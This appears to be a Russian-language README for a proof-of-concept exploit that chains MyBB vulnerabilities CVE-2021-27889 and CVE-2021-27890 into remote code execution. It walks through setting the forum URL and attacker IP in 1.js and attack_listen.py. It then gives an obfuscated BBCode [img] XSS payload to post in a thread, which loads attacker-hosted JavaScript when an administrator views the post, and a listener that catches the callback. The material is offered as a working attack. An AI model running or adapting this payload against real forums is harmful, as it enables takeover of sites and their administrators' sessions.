
Mybb связывает CVE-2021-27890 и CVE-2021-27889 с RCE poc
Mybb связывает CVE-2021-27890 и CVE-2021-27889 с RCE PoC
Перед использованием:
Здесь два файла: 1.js и attack_listen.py
Вам нужно изменить эти два файла:
1.js:
измените URL форума MyBB и URL атаки:
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py
attack_listen.py
измените хост и порт атаки:
attack_host = '192.168.92.165'
attack_port = 8080
Использование:
CVE-2021-27889 — это XSS. Перед выполнением атаки внедрите следующий payload в «Новую тему», «Ответ» или «Личные сообщения». В этой демонстрации я отправляю payload в «Новую тему».
обратите внимание, что 192.168.92.165 — это IP сервера злоумышленника, измените его.
[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]

Теперь наш вредоносный JS 1.js успешно внедрён. Затем мы ждём, пока администратор просмотрит этот пост, будучи залогиненным в админке.
Обратите внимание: администратору не обязательно быть залогиненным на странице форума.
В ожидании мы должны запустить «attack_listen.py» на нашей атакующей машине, чтобы определить, атакован ли администратор.
python3 attack_listen.py
Когда администратор просмотрит вредоносный пост, вредоносный JS выполнит атаку:

Мы можем получить информацию на нашей атакующей машине:

